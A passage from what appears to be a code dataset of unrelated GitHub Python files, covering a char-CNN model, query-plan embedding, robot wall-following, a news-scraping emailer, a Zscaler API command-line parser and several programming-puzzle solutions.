tf.device('/cpu:0'):\n self.embedding_weights = tf.get_variable( # 为每个字符形成的嵌入表\n \"char_embed\", [alphabet_size, char_embed_dim], dtype=DTYPE,\n initializer=tf.random_uniform_initializer(-1.0, 1.0))\n # shape (batch_size, unroll_steps, max_chars, embed_dim)\n self.char_embedding = tf.nn.embedding_lookup(self.embedding_weights,\n char_input)\n\n # for first model, this is False, for others it's True\n n_filters = sum(f[1] for f in filters)\n reuse = tf.get_variable_scope().reuse\n self.sequence_output = add_char_convolution(self.char_embedding, filters, activations, reuse)\n\n use_highway = n_highway is not None and n_highway > 0\n use_proj = n_filters != projection_dim\n if use_highway or use_proj:\n self.sequence_output = tf.reshape(self.sequence_output, [-1, n_filters])\n\n if use_highway:\n self.sequence_output = highway(self.sequence_output, n_highway)\n\n # set up weights for projection\n if use_proj:\n assert n_filters > projection_dim\n with tf.variable_scope('CNN_proj') as scope:\n W_proj_cnn = tf.get_variable(\n \"W_proj\", [n_filters, projection_dim],\n initializer=tf.random_normal_initializer(\n mean=0.0, stddev=np.sqrt(1.0 / n_filters)),\n dtype=DTYPE)\n b_proj_cnn = tf.get_variable(\n \"b_proj\", [projection_dim],\n initializer=tf.constant_initializer(0.0),\n dtype=DTYPE)\n self.sequence_output = tf.matmul(self.sequence_output, W_proj_cnn) + b_proj_cnn\n\n if use_highway or use_proj:\n orig_shape = [-1, sequence_length, projection_dim]\n self.sequence_output = tf.reshape(self.sequence_output, orig_shape)\n self.sequence_output = tf.nn.dropout(self.sequence_output, dropout_rate)\n\n def get_embedding_output(self):\n return self.char_embedding\n\n def get_highway_output(self):\n return self.sequence_output\n\n\ndef add_char_convolution(input, filters, activations, reuse):\n # input shape (batch_size, unroll_steps, max_chars, embed_dim)\n char_embed_dim = input.get_shape().as_list()[-1]\n char_length = input.get_shape().as_list()[-2]\n with tf.variable_scope(\"CNN\", reuse=reuse):\n convolutions = []\n for i, (width, num_filters) in enumerate(filters):\n if activations == 'relu':\n # He initialization for ReLU activation\n # with char embeddings init between -1 and 1\n # w_init = tf.random_normal_initializer(\n # mean=0.0,\n # stddev=np.sqrt(2.0 / (width * char_embed_dim))\n # )\n\n # Kim et al 2015, +/- 0.05\n w_init = tf.random_uniform_initializer(\n minval=-0.05, maxval=0.05)\n activation = tf.nn.relu\n elif activations == 'tanh':\n # glorot init\n w_init = tf.random_normal_initializer(\n mean=0.0,\n stddev=np.sqrt(1.0 / (width * char_embed_dim))\n )\n activation = tf.nn.tanh\n w = tf.get_variable( # 一个一维的卷积\n \"W_cnn_%s\" % i,\n # height, width, in_channel, out_channel, 这里的height设为1,因为只考虑一个单词内的字母排列,width为每次考虑width个字母\n # 后续卷积后的shape为(batch_size, sequence_length, char_length - width + 1, num_filters)\n [1, width, char_embed_dim, num_filters],\n initializer=w_init,\n dtype=DTYPE)\n b = tf.get_variable( # out_channel\n \"b_cnn_%s\" % i, [num_filters], dtype=DTYPE,\n initializer=tf.constant_initializer(0.0))\n\n conv = tf.nn.conv2d( # 卷积,从左到右\n input, w,\n strides=[1, 1, 1, 1],\n padding=\"VALID\") + b\n # now max pool\n # 使用一个max pool,每一行进行pooling\n # 取这些字母卷积后,最耀眼的一个位置,因此max_pool以后shape为(batch_size, sequence_length, 1, num_filters)\n # 这里可否把max_pool换成一个层叠卷积呢?\n conv = tf.nn.max_pool(\n conv, [1, 1, char_length - width + 1, 1],\n [1, 1, 1, 1], 'VALID')\n\n # activation\n conv = activation(conv)\n conv = tf.squeeze(conv, squeeze_dims=[2])\n\n convolutions.append(conv)\n\n return tf.concat(convolutions, 2)\n\ndef add_char_recurrent(input, filters, activations, reuse, bidirectional):\n pass\n\n\n# 参考highway网络的定义\ndef highway(input, n_highway):\n highway_dim = input.get_shape().as_list()[-1]\n sequence_length = input.get_shape().as_list()[-2]\n for i in range(n_highway):\n with tf.variable_scope('high_%s' % i) as scope:\n W_carry = tf.get_variable( # 这些都是get_variable\n 'W_carry', [highway_dim, highway_dim],\n # glorit init\n initializer=tf.random_normal_initializer(\n mean=0.0, stddev=np.sqrt(1.0 / highway_dim)),\n dtype=DTYPE)\n b_carry = tf.get_variable(\n 'b_carry', [highway_dim],\n initializer=tf.constant_initializer(-2.0),\n dtype=DTYPE)\n W_transform = tf.get_variable(\n 'W_transform', [highway_dim, highway_dim],\n initializer=tf.random_normal_initializer(\n mean=0.0, stddev=np.sqrt(1.0 / highway_dim)),\n dtype=DTYPE)\n b_transform = tf.get_variable(\n 'b_transform', [highway_dim],\n initializer=tf.constant_initializer(0.0),\n dtype=DTYPE)\n input = tf.reshape(input, [-1, highway_dim])\n\n carry = tf.matmul(input, W_carry) + b_carry\n carry_gate = tf.nn.sigmoid(carry)\n\n transform = tf.matmul(input, W_transform) + b_transform\n transform_gate = tf.nn.relu(transform)\n\n return carry_gate * transform_gate + (1.0 - carry_gate) * input\n\n\n\n\n\n","repo_name":"Zhengxuru/charCNN-BERT-CRF","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14668,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"15650830407","text":"# Description: 主要是获取redis中AQP的DFS node, 然后调用两层sent2vec模型, 最后求vector之间的欧式距离\nimport os\nimport redis\nimport numpy as np\nfrom dictfile.read_dict import get_AQP_node_dict\nfrom dictfile.read_dict import read_rule_file\nfrom sent2vec import Word\nfrom sent2vec import Sentence\nfrom sent2vec import sentence_to_vec\nfrom sklearn import preprocessing\nimport collections\nimport time\n\n\nclass AQP:\n def __init__(self, id, key, statement, vector):\n self.id = id # AQP的自增ID\n self.key = key # Id\n self.statement = statement # 由sent2vec中的Word实例(node index:vector)序列够成\n self.vector = vector # 初始为空,后续补充为该method对应的sentence vector\n self.distance = -1.0 # AQP与QEP之间的向量距离\n self.distance_norm = -1.0 # 归一化后的距离\n\n\ndef getAQPWords(nodes):\n \"\"\"\n 对于给定method的每个node,根据node index在node-vec字典中找到其对应的vector,调用sent2vec中的Word构造函数,并将Word实例加入到该method对应的Word序列method_vec_list\n :param nodes:\n :return:\n \"\"\"\n AQP_node_vec_list = []\n for index in nodes:\n if index in AQP_node_dict.keys():\n word_list.append(index)\n word = Word(index, AQP_node_dict[index])\n AQP_node_vec_list.append(word)\n return AQP_node_vec_list\n\n\ndef getRedisAQPs():\n \"\"\"\n 为redis数据库中收集的每个method(key:value),以method的id、key、line、Word序列构建Method实例,并得到Method实例序列\n :return:\n \"\"\"\n AQPs = []\n for i in range(data_size):\n key = keys[i].decode()\n # 将redis中的一个AQP分解为多个node,分隔符为`,`\n node_seq = jedis.get(keys[i]).decode().split(\",\")\n AQP_nodes = list(node_seq)\n vector = []\n # 调用sent2vec,得到该method_i对应的Word序列,组成statement\n statement = getAQPWords(AQP_nodes)\n # 构建Method实例\n aqp = AQP(i, key, statement, vector)\n AQPs.append(aqp)\n return AQPs\n\n\ndef get_word_counts(word_list):\n word_counts = collections.Counter(word_list)\n return word_counts\n\n\ndef get_word_frequency(word_text, word_counts, word_list_len):\n word_count = word_counts.get(word_text)\n if (word_count != None):\n # print(word_text, word_count, word_list_len)\n return (word_counts.get(word_text) * 1.0 / (word_list_len * 1.0))\n else:\n return 1.0\n\n\ndef getWordFrequencyDict(word_list):\n \"\"\"\n 根据\n :param word_list:\n :return:\n \"\"\"\n word_counts = get_word_counts(word_list)\n word_list_len = len(word_list)\n rule_indexs = read_rule_file(AQP_node_index_path)\n\n # 清空fre_dict\n f_dict = open(AQP_node_fre_path, 'w')\n f_dict.truncate(0)\n\n for word_text in rule_indexs:\n word_frequency = get_word_frequency(word_text, word_counts, word_list_len)\n # a_value = a / (a + word_frequency)\n with open(AQP_node_fre_path, 'a+') as fw:\n s = str(word_text) + \" \" + str(word_frequency) + '\\n'\n fw.write(s)\n\n\ndef getAvalueDict():\n \"\"\"\n 根据fredict.txt文件中的index-value序列,创建以index为索引,值为value的一维数组avaluedict\n :return:\n \"\"\"\n getWordFrequencyDict(word_list)\n avaluedict = {}\n for line in open(AQP_node_fre_path):\n kv = line.split(\" \")\n avaluedict[kv[0]] = kv[1].replace(\"\\n\", \"\")\n return avaluedict\n\n\ndef getVectorAQPs():\n \"\"\"\n 对于AQP实例序列,补充每个AQP实例的sentence vector\n :return:\n \"\"\"\n AQPs = getRedisAQPs() # AQP 实例序列\n avaluedict = getAvalueDict() # 根据fredict.txt,构建以node index为索引,单词频率为值的一维数组\n sentence_list = [] # Sentence实例(AQP节点序列)的序列\n # 将每个AQP对应的Word实例序列,作为参数创建一个Sentence实例\n for i in range(len(AQPs)):\n sentence_list.append(Sentence(AQPs[i].statement))\n # 将每个method对应的Sentence实例转换为vector\n sentence_vectors = sentence_to_vec(sentence_list, embedding_size, avaluedict)\n # 将sentence_vectors赋值给method中对应的成员变量\n for i in range(len(AQPs)):\n AQPs[i].vector = sentence_vectors[i]\n return AQPs\n\n\ndef cal_l2_dist(vec1, vec2):\n return np.sqrt(np.sum(np.square(vec1 - vec2)))\n\n\ndef cal_distance(vec1, vec2):\n dist = np.linalg.norm(vec1 - vec2)\n return dist\n\n\ndef min_max_normalization(distance_list):\n min_max_scaler = preprocessing.MinMaxScaler()\n distance_list_norm = min_max_scaler.fit_transform(np.array(distance_list).reshape(-1, 1))\n return distance_list_norm\n\n\ndef method_compare():\n \"\"\"\n 对于redis中的每个method(由Word实例序列够成),通过sent2vec,\n 利用单词频次和权重,处理得到每个method的sentence vector,\n 接着,两两计算得到sentence vector间的欧氏距离\n :return: 返回欧氏距离矩阵\n \"\"\"\n # 得到redis中每个AQP对应的AQP class实例:包含sentence vector\n AQPs = getVectorAQPs()\n\n # 输出AQP个数\n print(\"the number of AQPs:\", len(AQPs))\n\n # 得到每个AQP与QEP的向量距离\n distance_list = [0]\n for i in range(len(AQPs)):\n if i == 0:\n continue\n distance_list.append(cal_l2_dist(AQPs[0].vector, AQPs[i].vector))\n\n # 得到归一化的向量距离\n distance_list_norm = min_max_normalization(distance_list)\n for i in range(len(AQPs)):\n AQPs[i].distance_norm = distance_list_norm[i][0]\n AQPs[i].distance = distance_list[i]\n\n # 按照向量距离从大到小对AQPs排序\n AQPs_sorted = sorted(AQPs, key=lambda aqp: aqp.distance, reverse=True)\n\n print(\"farthest AQP from QEP: \", AQPs_sorted[0].id, AQPs_sorted[0].distance_norm)\n print(\"closet AQP from QEP: \", AQPs_sorted[len(AQPs) - 1].id, AQPs_sorted[len(AQPs) - 1].distance_norm)\n return AQPs_sorted\n\n\ndef i_tips(cnt):\n return AQPs_sorted[cnt]\n\n\ndef b_tips(k):\n return AQPs_sorted[:k]\n\n\ndef calculate_interestingness(selected_AQPs):\n \"\"\"\n 对\n :param selected_AQPs:\n :return:\n \"\"\"\n\n interestingness = 0\n\n return interestingness\n\n\nif __name__ == '__main__':\n # 输入查询name\n print('input the name of query')\n query_name = input()\n\n # 得到被检测源码中每个method的key\n jedis = redis.Redis(host='127.0.0.1', port=6379, db=0)\n keys = jedis.keys()\n\n data_size = len(keys) # redis中method的个数/记录的条数\n word_list = [] # 存储redis中存在于node-vec字典中的node index\n embedding_size = 128 # 记录node vector的维度\n\n # 得到node-vec字典训练数据\n dict_path = os.path.abspath(os.path.dirname(os.getcwd())) + '/GenerateTreeVector/dictfile/new/'\n AQP_node_index_path = dict_path + 'AQPNodeIndex.txt'\n AQP_node_vector_path = dict_path + 'AQPNodeVector.txt'\n AQP_node_fre_path = dict_path + 'AQPNodeFreDict.txt'\n\n # 得到skip gram模型训练得到的node-vec字典\n AQP_node_dict = get_AQP_node_dict(AQP_node_index_path, AQP_node_vector_path)\n\n time_start = time.time()\n print(\"开始时间:\", time.time())\n print(\"data_size: \", data_size)\n\n # 比较得到QEP与每个AQP vector间的欧氏距离\n AQPs_sorted = method_compare()\n time_end = time.time()\n print(\"结束时间:\", time.time())\n print('time cost', time_end - time_start, 's')\n\n # 记录消耗时间\n print('time cost', time_end - time_start, 's')\n fout_time = open(\n os.getcwd() + '/output/' + query_name[0:4] + '/' + query_name[5:] + '/generate_aqp_vector_time.txt',\n 'w+')\n fout_time.write(str(time_end - time_start))\n fout_time.close()\n\n # choose TIPS\n print(\"i(i-tips) / b(b-tips?\")\n\n choose = input()\n\n if choose == 'i':\n cnt = 0\n while choose == 'i':\n t = i_tips(cnt)\n print(cnt, t.id, t.distance_norm)\n cnt += 1\n choose = input()\n elif choose == 'b':\n # get k\n print(\"input the number of AQPs to be selected(q to quit)\")\n k = input()\n\n # get name & id\n db_name = query_name[0:4]\n query_id = query_name[5:]\n\n # 将selected AQP序号写入到相应文件中\n output_file_path = (os.path.abspath(\n os.path.dirname(os.getcwd())) + '/GenerateTreeVector/output/' + db_name + '/' + query_id + '/' + str(k) + '_selected_aqps.txt')\n\n # get selected AQPs\n aqps = b_tips(int(k))\n\n # convert to string\n selected_query = ''\n for i in range(int(k)):\n print(i, aqps[i].id, aqps[i].distance_norm)\n selected_query += str(aqps[i].id)+'\\n'\n selected_query = selected_query.rstrip('\\n')\n\n # storage\n output_file = open(output_file_path, 'w')\n output_file.write(selected_query)\n output_file.close()\n\n else:\n print(\"wrong char\")\n","repo_name":"ZiHao256/InfoPlan","sub_path":"EmbeddingMethod/src/GenerateTreeVector/generate_and_compare.py","file_name":"generate_and_compare.py","file_ext":"py","file_size_in_byte":8983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36012075244","text":"'''\r\nSamuel Howell \r\nCS330\r\nProject 5\r\n\r\n\r\nNote: you need to install pkgs from the cmd line outside of the vs code application\r\n'''\r\n\r\nfrom Robot import Robot\r\nimport time\r\n\r\n\r\n\r\nbyteList = []\r\nflag = False\r\nrobot = Robot('COM3')\r\ndirection = \"n\"\r\n\r\n#! MAKE SURE THE CORD IS PLUGGED ALL THE WAY IN\r\ndef initRobot():\r\n robot.reset() \r\n time.sleep(1)\r\n robot.start()\r\n time.sleep(1)\r\n robot.safe()\r\n time.sleep(1)\r\n print(\"ready to run\")\r\n robot.clearBuffer()\r\n\r\n \r\n\r\ninitRobot()\r\n\r\n# move forward until bump\r\nwhile(flag == False):\r\n robot.driveDirect(0,150,0,150)\r\n\r\n robot.sendCommand(b'\\x8E\\x07') # bump detected\r\n readList = robot.read(1)\r\n \r\n\r\n bumpDetected =(int(readList[0], 2) & 1 == 1 or int(readList[0], 2) & 2 == 2) # use bitmasking to isolate and check each status bit to determine if left or right bump have been triggered\r\n \r\n if(bumpDetected):\r\n flag = True\r\n print(\"bump detected\")\r\n robot.driveDirect(254,150,254,150) # drive backward to create some space for the turn\r\n time.sleep(.2)\r\n robot.driveDirect(0, 150, 255, 106) #rotate 90 degrees in a west direction to get the wall to the right of the wall sensor. #! make sure robot is rotating enought to get a good inital read from the side\r\n time.sleep(1.5) \r\n robot.driveDirect(0,0,0,0)\r\n \r\n\r\n\r\nwhile(flag == True):\r\n #robot.driveDirect(0,50,0,50)\r\n #robot.sendCommand(b'\\x8E\\x07') # bump detected\r\n \r\n robot.queryLight()\r\n byteList.append(robot.readTwo()) #! make sure that you come in from the side more so than you think\r\n \r\n\r\n\r\n currentByte = int(str(byteList[len(byteList)-1]).lstrip('[').rstrip(']')) # this takes \"[x]\" and makes is \"x\" so it can be converted to an int.\r\n print(\"current: \" + str(currentByte))\r\n \r\n error = 150 - currentByte # desired distance - actual distance\r\n ref = 40\r\n prop = robot.pController(error)\r\n\r\n print(\"prop: \", str(prop), \" error: \" + str(error), \" distance: \", str(currentByte))\r\n \r\n\r\n # wait for serial comm to stop sending before you run program again\r\n # current byte is measurement from the wall. we want to keep it at around 40\r\n\r\n if (currentByte > 150):\r\n currentByte = 150\r\n if (currentByte == 0): # ifthe robot is too far away from the wall, set current byte to ref - 1 to send the robot right.\r\n currentByte == ref - 1\r\n if (currentByte < ref): # move closer to the wall, turning right #!can change 10 to 0 for even tighter turns if necessary depending on complexity of the obstacle\r\n robot.driveDirect(0, 50 - prop, 0, 50 + prop)\r\n print(\"R\")\r\n if (currentByte > ref): # move away from the wall, turning left\r\n robot.driveDirect(0, 50 + prop, 0, 50 - prop)\r\n print(\"L\")\r\n if (currentByte == ref): # go straight\r\n robot.driveDirect(0, 70, 0, 70)\r\n\r\n \r\n #check for a bump\r\n robot.sendCommand(b'\\x8E\\x07') # bump detected\r\n readList = robot.read(1)\r\n bumpDetected =(int(readList[0], 2) & 1 == 1 or int(readList[0], 2) & 2 == 2)\r\n \r\n if(bumpDetected):\r\n robot.driveDirect(0, 150, 255, 106) #rotate 90 degrees in a west direction to get the wall to the right of the wall sensor. #! make sure robot is rotating enought to get a good inital read from the side\r\n time.sleep(.3)\r\n robot.driveDirect(0, 0, 0, 0)\r\n \r\n \r\n if(len(byteList) > 5): # don't let the list grow large\r\n byteList.pop(0)\r\n\r\n\r\n\r\n\r\n'''\r\n*65% of the grade:*\r\nUSE P-CONTROLLER ONLY: Write a program that commands the iRobot Create to respond in the following ways:\r\n1. Start the robot driving. It should drive until it contacts a wall – you may ensure there is nothing else in its path. At the wall, it should rotate and align itself parallel to the surface.\r\n2. Once the robot is parallel to the surface of the wall, it should begin translating again keeping a set distance from the surface (you decide distance).\r\n3. While following the wall, it should pay attention to its bump sensors and using those along with its wall range sensor and should attempt to circumnavigate anything–imagine a shoe–it finds in its way.\r\n4. Points will be awarded for how well the robot stabilizes following the wall, how well it corners and how well it circumnavigates obstacles along the wall.\r\n\r\n*10% of the grade:*\r\n5. Upload a video of your robot driving along the wall with the same obstacles to YouTube. The video should be named the following way:FMU CS330 Robotics Fall 2022, Lab Project #5, [first, last names of all the students in the team]: Kp=[your Kp].\r\n\r\n*15% of your grade:*\r\n6. Create a report where you explain how you choose a period of quering sensor data, reference, Kp, Ki, Kd, transition function, draw a control system you use in your project.\r\n\r\n*10% of your grade:*\r\n7. Slack usage:\r\n7.1 Learn how to share files on Slack using Googe Drive. Share a file with your partner (team).\r\n7.2 Learn how to incorporate the Trello app in a slack. Learn how to add a card, make a comment, assign a teammate to a card.\r\n7.3 Send a private video message to your partner with some meaningful content.using /voice command.\r\n7.4 Set up a zoom conference via slack (using /zoom).\r\n7.5 Also, using the https://lunchtrain.builtbyslack.com/ schedule a lunch with your partner (yourself), and make him join you, show me the reminders from the slack bot\r\n'''\r\n","repo_name":"samuel-howell/CS330","sub_path":"project5.py","file_name":"project5.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1560917068","text":"from .reduce_html import reduce_html\nfrom .send_email import send_email\n\n\nasync def get_html(url, browser):\n # browser = await launch(headless=True)\n\n page = await browser.newPage()\n\n try:\n await page.goto(url, timeout=30000)\n html = await page.evaluate(\n \"() => document.body.innerText\"\n )\n # html = await page.content()\n await page.close()\n return html\n except Exception as err:\n send_email(\n 'Ocorreu um erro no Radar da Inovação',\n body=f\"\"\"\n

      Erro no MSS SCAN EDITAIS

      \n

      Tentativa de acesso na URL: {url}

      \n

      Erro do console: {err}

      \n \"\"\"\n )\n\n return 'PÁGINA COM ERRO'\n\n\nasync def get_html_async(url, browser):\n html = await get_html(url, browser)\n html = reduce_html(html)\n print(f'TAMANHO DO TEXTO: {len(html)}')\n return html\n","repo_name":"caiogtoledo/mss_scan_editais","sub_path":"helpers/get_html_async.py","file_name":"get_html_async.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27615226800","text":"\"\"\"\nThis package contains the necessary structures to use the implemented methods of the zia_client.session.ZIAConnector class\nthrough the command line script ziaclient.py.\n\nAs of now, only the functionality for locations and users has been translated.\n\nSee the submodules for detailed functionality.\n\"\"\"\nimport argparse as ap\nimport ast\nimport datetime as dt\nimport json\n\nfrom api_parser._locations import create_location_subparser\nfrom api_parser._traffic import create_traffic_subparser\nfrom api_parser._users import create_user_subparser\n\n\ndef create_parser():\n \"\"\"\n Creates the parser. It calls the necessary functions to build the subparsers.\n\n Returns:\n Returns the built parser.\n \"\"\"\n parser = ap.ArgumentParser(\n description=\"\"\"**ZIA API command line script.**\n \n Python script that communicates with the Zscaler Internet Access API.\n It's composed of various subparsers, each one representing the configured modules in the `zia_client` module.\n \n The keyword arguments listed below can be always specified before the desired subparser.\"\"\"\n )\n\n # Main parser commands\n parser.add_argument('--pending', help=\"Lists pending changes.\", action='store_true')\n parser.add_argument(\n '--apply_after',\n help='Forces application of changes before logging out after several requests.',\n type=int,\n default=0\n )\n parser.add_argument('--conf', help='Specifies config file.', default='config/config.json')\n parser.add_argument('--creds', help='Specifies config file.', type=_json_obj_file, default=None)\n parser.add_argument('--output', '-o', help='Custom path where the output JSON will be stored.',\n default=_output_name())\n parser.add_argument('--no_verbosity', help='Disables detailed verbosity.', action='store_true')\n parser.add_argument('--print_results', '-p', help='Prints results.', action='store_true')\n\n # Create subparsers\n subparsers = parser.add_subparsers(required=True, dest='Any of the subcommands')\n\n # Create user parser\n create_user_subparser(subparsers)\n\n # Create location parser\n create_location_subparser(subparsers)\n\n # Create traffic parser\n create_traffic_subparser(subparsers)\n\n return parser\n\n\ndef _output_name():\n \"\"\"\n Creates a name for the output file where the search or operation results will be stored if no custom name is \\\n provided.\n\n Returns:\n str: A string with the format `search_%Y-%m-%d_%H-%M-%S.json`.\n ``Example: search_2021-01-01_14-13-12.json``\n\n\n \"\"\"\n today = dt.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n return f'query_{today}.json'\n\n\ndef _boolstring(arg):\n \"\"\"\n Checks api_parser that are not required and have default values on the server. Argument is a string but mus be\n converted to True, False or ''.\n\n Args:\n arg (str): Parsed argument.\n\n Returns:\n bool or empty string:\n \"True\" -> `True`\n\n \"False\" -> `False`\n\n Anything else -> `''`\n\n \"\"\"\n if arg == 'True':\n return True\n elif arg == 'False':\n return False\n else:\n return ''\n\n\ndef _json_obj_file(arg: str):\n if arg.endswith('.json'):\n with open(arg) as f:\n return json.load(f)\n else:\n data = ast.literal_eval(arg)\n try:\n return json.dumps(data)\n except json.JSONDecodeError:\n raise ap.ArgumentTypeError('Input should be a JSON object.')\n","repo_name":"javiruizs/ZIA-API-Connector","sub_path":"api_parser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23617141791","text":"import sys, math, re\r\n\r\n \r\n\r\n\r\n\r\ndef main():\r\n# inFile = sys.__stdin__\r\n# outFile = sys.__stdout__\r\n inFile = open('B-large.in', 'rt')\r\n outFile = open(inFile.name.replace('.in', '.out'), 'wt')\r\n T = int(inFile.readline())\r\n for t in xrange(1,T+1):\r\n tt = inFile.readline().strip().split(' ')\r\n# print '------------------', tt\r\n tt.reverse()\r\n C = int(tt.pop())\r\n c = [tt.pop() for _ in xrange(C)]\r\n D = int(tt.pop())\r\n d = [tt.pop() for _ in xrange(D)]\r\n N = int(tt.pop())\r\n seq = list(tt.pop())\r\n out = ''\r\n cc = []\r\n for s in c:\r\n a,b,c = s\r\n expr = re.compile('(%s%s|%s%s)$' % (a,b,b,a))\r\n cc.append((expr, c))\r\n dd = []\r\n for s in d:\r\n a,b = s\r\n expr = re.compile('(%s.*?%s)|(%s.*?%s)' % (a,b,b,a))\r\n dd.append(expr)\r\n for s in seq:\r\n out += s\r\n for e, s in cc:\r\n out, n = e.subn(s, out, 1)\r\n for e in dd:\r\n if e.search(out):\r\n out = ''\r\n break\r\n \r\n outFile.write('Case #%d: [%s]\\n' % (t, ', '.join(out)))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30935967298","text":"def read_input():\n inputs = []\n\n input_file = open(\"input\")\n for line in input_file:\n inputs.append(line.strip('\\n'))\n\n return inputs\n\ndef gamma_rate(inputs):\n new_code = []\n\n for i in range(WORD_LENGTH):\n total_0s = 0\n total_1s = 0\n for _, value in enumerate(inputs):\n if int(value[i]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n if total_0s > total_1s:\n new_code.append(0)\n else:\n new_code.append(1)\n\n return new_code\n\ndef epsilon_rate(inputs):\n new_code = []\n\n for i in range(WORD_LENGTH):\n total_0s = 0\n total_1s = 0\n for _, value in enumerate(inputs):\n if int(value[i]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n if total_0s < total_1s:\n new_code.append(0)\n else:\n new_code.append(1)\n\n return new_code\n\ndef convert_to_dec(binary_num):\n dec_value = 0\n for i in range(WORD_LENGTH-1, -1, -1):\n if binary_num[WORD_LENGTH-1-i] == 1:\n dec_value += (2**i)\n return dec_value\n\ndef find_o2_rating(inputs, position, current_size):\n total_0s = 0\n total_1s = 0\n\n if current_size == 1:\n return inputs\n\n for i in range(current_size):\n if int(inputs[i][position]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n\n keep_value = 1\n keep_inputs = []\n if total_0s > total_1s:\n keep_value = 0\n\n for i in range(current_size):\n if int(inputs[i][position]) == keep_value:\n keep_inputs.append(inputs[i])\n else:\n current_size -= 1\n\n return find_o2_rating(keep_inputs, position+1, current_size)\n\ndef find_co2_rating(inputs, position, current_size):\n total_0s = 0\n total_1s = 0\n\n if current_size == 1:\n return inputs\n\n for i in range(current_size):\n if int(inputs[i][position]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n\n keep_value = 0\n keep_inputs = []\n if total_0s > total_1s:\n keep_value = 1\n\n for i in range(current_size):\n if int(inputs[i][position]) == keep_value:\n keep_inputs.append(inputs[i])\n else:\n current_size -= 1\n\n return find_co2_rating(keep_inputs, position+1, current_size)\n\n\nif __name__ == \"__main__\":\n values = read_input()\n global WORD_LENGTH\n WORD_LENGTH = len(values[0])\n\n # part 1\n gamma = gamma_rate(values)\n epsilon = epsilon_rate(values)\n\n dec_gamma = convert_to_dec(gamma)\n dec_epsilon = convert_to_dec(epsilon)\n print(dec_gamma*dec_epsilon)\n\n # part 2\n o2_rating = find_o2_rating(values, 0, len(values))\n co2_rating = find_co2_rating(values, 0, len(values))\n\n dec_o2_rating = int(o2_rating[0],2)\n dec_co2_rating = int(co2_rating[0],2)\n print(dec_o2_rating*dec_co2_rating)\n","repo_name":"jramdass/advent-of-code","sub_path":"2021/day-03/binary_diagnostic.py","file_name":"binary_diagnostic.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21053168233","text":"from flask import Flask\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport sqlite3\nimport logging\n\nlogging.basicConfig(filename='example.log', level=logging.DEBUG)\n\nURL = os.environ['SOURCE_URL']\nAGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n\napp = Flask(__name__)\n\n\ndef send_simple_message(title, message):\n return requests.post(\n os.environ['MAIL_URL'],\n auth=(\"api\", os.environ['MAILGUN_API_KEY']),\n data={\"from\": \"Embevent App \",\n \"to\": os.environ['MAIL_LIST'].split(\";\"),\n \"subject\": title,\n \"text\": message})\n\ndef processUpdates(cards):\n connection = sqlite3.connect(\"database.db\")\n cursor = connection.execute(\"Select * from CARDS\")\n old_cards = len(cursor.fetchall())\n\n if len(cards) > old_cards:\n logging.info(\"New updates. Processing\")\n \n card = cards[0]\n title = card.find_all('h2', class_='h3')[0].text\n date = card.find_all('h3', class_='h5')[0].text\n content = card.find_all([\"p\", \"div\"])[0]\n\n command2 = \"INSERT INTO CARDS (title, date, content) VALUES ('{0}', '{1}', '{2}')\".format(title,date,content)\n \n connection.execute(command2)\n connection.commit()\n connection.close()\n\n logging.info(\"Update stored in DB\")\n\n send_simple_message(title=title, message=card)\n\n logging.info(\"Mail sent\")\n return card.text\n else:\n logging.info(\"No updates generated\")\n f = cards[0]\n the_date, = f.find_all('h3', class_='h5')\n return \"No news. Last update: {0}. articles available: {1}\".format(the_date.text, old_cards)\n\n@app.route('/')\ndef news():\n if not URL:\n return \"No URL added\"\n response = requests.get(URL, headers={'User-Agent': AGENT })\n soup = BeautifulSoup(response.content, 'html.parser')\n cards = soup.find_all('div', class_='card')\n return processUpdates(cards)","repo_name":"mleger45/embevent","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23608375081","text":"import sys\r\n\r\nfp = open('large.in', 'r')\r\nout = open('output', 'w')\r\n\r\n#fp = open('input', 'r')\r\n#out = sys.stdout\r\n\r\ncases = int(fp.readline())\r\n\r\nfor case in range(cases):\r\n existe = set()\r\n \r\n parms = [int(x) for x in fp.readline().split()]\r\n\r\n for x in range(parms[0]):\r\n row = fp.readline().strip()\r\n path = '/'\r\n for dir in row[1:].split('/'):\r\n# print path + dir\r\n existe.add(path + dir)\r\n path = path + dir + '/'\r\n \r\n result = 0\r\n for y in range(parms[1]):\r\n row = fp.readline().strip()\r\n path = '/'\r\n for dir in row[1:].split('/'):\r\n# print path + dir\r\n if path+dir not in existe:\r\n result += 1\r\n existe.add(path+dir)\r\n path = path + dir + '/'\r\n \r\n out.write('Case #' + str(case + 1) + ': ' + str(result) + '\\n')\r\n case += 